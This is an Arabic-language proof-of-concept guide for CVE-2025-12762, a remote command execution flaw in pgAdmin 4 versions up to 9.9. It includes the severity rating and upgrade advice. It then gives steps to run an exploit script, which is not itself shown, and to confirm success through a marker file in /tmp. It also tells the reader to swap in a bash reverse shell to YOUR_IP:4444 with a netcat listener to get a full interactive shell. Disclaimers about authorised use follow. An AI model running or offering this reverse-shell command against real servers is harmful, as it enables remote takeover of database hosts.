
CVE-2025-12762

توجد ثغرة تنفيذ أوامر عن بعد (RCE) في pgAdmin 4 الإصدارات ≤ 9.9. يمكن للمهاجمين تشغيل أوامر عشوائية على المضيف عندما يكون pgAdmin قيد التشغيل في وضع الخادم ويقوم بمعالجة تفريغ SQL بصيغة PLAIN أثناء الاستعادة.
🟥 9.1 / 10 — خطير
⬆️ قم بالترقية إلى pgAdmin 4 v10.0 أو أحدث
غالبًا ما يُستخدم pgAdmin لإدارة قواعد بيانات PostgreSQL الحيوية، مما يعني:
# 1. احفظ الملف باسم CVE-2025-12762.py
# 2. ثبت التبعية
pip3 install requests
# 3. شغّله
python3 CVE-2025-12762.py
بعد التشغيل، تحقق من:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
وجود الملف → لقد استغليت CVE-2025-12762 فعليًا.
استبدل سطر COMMAND بـ:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
ثم nc -lvnp 4444 → صدفة تفاعلية كاملة.
هذا هو النص البرمجي الدقيق الذي يستخدمه الباحثون والمختبرون وفرق الاختراق حول العالم في نوفمبر 2025.
استخدم بمسؤولية. صوب كل شيء. ابقَ قانونيًا.
تم تقديم هذا الإثبات المفاهيمي للاستخدام المصرح به والتعليمي فقط.
يمكنك تشغيله حصريًا على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
أي استخدام غير مصرح به غير قانوني وينتهك قوانين إساءة استخدام الحواسيب.
استخدم بمسؤولية، وصوب فورًا بعد الاختبار، ولا تستهدف أي نظام بدون إذن.